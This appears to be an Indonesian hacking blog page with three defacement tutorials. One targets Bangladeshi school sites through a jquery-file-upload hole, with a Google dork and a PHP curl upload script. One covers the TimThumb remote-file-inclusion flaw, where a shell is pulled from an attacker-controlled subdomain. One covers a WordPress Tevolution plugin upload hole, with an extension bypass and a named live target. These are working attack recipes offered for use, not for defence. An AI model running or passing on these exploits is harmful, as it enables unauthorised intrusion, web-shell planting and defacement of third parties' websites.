Showing posts with label Exploit. Show all posts
  • Deface website sekolah Bangladesh

    hallo.

    kali ini ane pengen share cara deface school Bangladesh.
    ya kyk bug balitbang lah kalo di indo.

    Bugnya ada di plugin jquery-file-upload.
    yaudah langsung aja.

    dork: Developed by exdmania

    script:

     <?php
    $file = "kkk.htm"; //shell ataupun script deface
    $post = array("files[]" => "@$file",
    );
    $ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
    curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch2, CURLOPT_POST, 1);
    curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
    $data = curl_exec ($ch2);
    echo $data."\n\n\n";
    ?>
    POC:

    hasil:
    /assets/super_admin/vendor/jquery-file-upload/server/php/files/




  • Tutorial Deface Dengan TimThumb 1.14

    Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,,
    Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti " 
     
    no image specified
    Query String : 
    TimThumb version : 1.19 
     
    berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version . 
    Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan 
    1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP .. 
     
    Alat dan Bahan : 
    1. Subdomain yang terintegrasi website berikut 
       : picasa.com
       : blogger.com
       : flixr.com 
     
    sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "
    , Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory
    public_html / httpdocs / www / dan macam² .. 
      
    2. Otak dan pantang menyerah ;) .. 

    Exploit : 
    1. Kali ini saya dah punya target sendiri ,, lihat gambar .. 
    2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar .. 
    3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :
    " /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..
    4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php "  , lihat di bawah ,,
    5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
    hehe sory yak uploadernya punya pak deb~X ,,


    Source : Extreme Crew 
    post diambil dari SINI
  • wordpress Plugins Tevolution

    Dork :inur:plugins/tevolution < Bisa di kembangin
    Exploit:wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
    Array Filedata , ataugak pake mass exploiternya agus 
    localheart.esy.es/public_html/public_html/tools/ <auto exploit

    Bypass shell , shell.php4 , 
    Shell akses / wp-content/uploads/2016/05/shell.php


    Btw di site itu kalo search di google image ada yang tevolution-directory , atau sebagainya langsung exploit aja pake exploit di atas 


    Author : Stupidc0de

    GreetZ : Sanjungan jiwa - indoxploit

    http://ezeebe.com/wp-content/plugins/Tev...upload.php < Live target
    Vuln site : BLANK!


    Sumber : Post diambil dari Forum IndoXploit yang post oleh Condet6etar
  • Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo